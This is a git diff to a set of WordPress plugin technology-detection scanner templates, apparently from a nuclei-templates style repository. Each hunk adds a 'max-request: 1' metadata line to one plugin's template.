diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
